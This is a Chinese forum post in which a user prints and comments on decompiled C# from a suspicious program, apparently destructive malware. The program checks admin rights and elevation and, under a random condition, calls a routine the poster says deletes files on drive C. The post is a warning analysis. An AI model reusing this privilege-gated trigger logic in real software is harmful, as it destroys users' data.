源码呢 替你反编译出来了
没在注释上看到是谁开发的 根本也就没有注释 看两个EXE代码风格呢 像是一个人写的
我重点分析了下 CSC这个EXE 主函数这些的是这个代码 我加了注释
有点意思 大家看看
程序代码:
private void MainForm_Load(object sender, EventArgs e)
{
Exception exception;
try
{
//这里判断你当前的用户是不是管理员组的
this.lbInAdminGroup.Text = this.IsUserInAdminGroup().ToString();
}
catch (Exception exception1)
{
exception = exception1;
this.lbInAdminGroup.Text = "N/A";
MessageBox.Show(exception.Message, "An error occurred in IsUserInAdminGroup", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
try
{
this.lbIsRunAsAdmin.Text = this.IsRunAsAdmin().ToString();
}
catch (Exception exception2)
{
exception = exception2;
this.lbIsRunAsAdmin.Text = "N/A";
MessageBox.Show(exception.Message, "An error occurred in IsRunAsAdmin", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
//操作系统的版本
if (Environment.OSVersion.Version.Major >= 6)
{
try
{
bool flag3 = this.IsProcessElevated();
this.lbIsElevated.Text = flag3.ToString();
this.btnElevate.FlatStyle = FlatStyle.System;
CSUACSelfElevation.NativeMethods.SendMessage(this.btnElevate.Handle, 0x160c, 0, flag3 ? IntPtr.Zero : ((IntPtr) 1));
}
catch (Exception exception3)
{
exception = exception3;
this.lbIsElevated.Text = "N/A";
MessageBox.Show(exception.Message, "An error occurred in IsProcessElevated", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
try
{
//进程级别 他想干啥?
switch (this.GetProcessIntegrityLevel())
{
case 0x2000:
this.lbIntegrityLevel.Text = "Medium";
goto Label_0238;
case 0x3000:
this.lbIntegrityLevel.Text = "High";
goto Label_0238;
case 0x4000:
this.lbIntegrityLevel.Text = "System";
goto Label_0238;
case 0:
this.lbIntegrityLevel.Text = "Untrusted";
goto Label_0238;
case 0x1000:
this.lbIntegrityLevel.Text = "Low";
goto Label_0238;
}
this.lbIntegrityLevel.Text = "Unknown";
}
catch (Exception exception4)
{
exception = exception4;
this.lbIntegrityLevel.Text = "N/A";
MessageBox.Show(exception.Message, "An error occurred in GetProcessIntegrityLevel", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
}
else
{
this.lbIsElevated.Text = "N/A";
this.lbIntegrityLevel.Text = "N/A";
}
Label_0238:
if (!this.IsUserInAdminGroup())
{
//如果用户不是管理员组的 那就登录一个网站 你可以看我结尾的图
this.admingroup_elevate();
}
if (!(this.IsProcessElevated() || !this.IsUserInAdminGroup()))
{
this.iselevated_elevate();
}
if ((((this.lbInAdminGroup.Text == "True") && (this.lbIsElevated.Text == "True")) && (this.lbIsRunAsAdmin.Text == "True")) && (this.rand.Next(5) == this.rand.Next(5)))
{
//看到这里就知道了 以上几个条件都满足 删掉你C盘文件
this.AccessFileSystem();
}
Application.Exit();
}
[
本帖最后由 wangnannan 于 2014-1-3 10:47 编辑 ]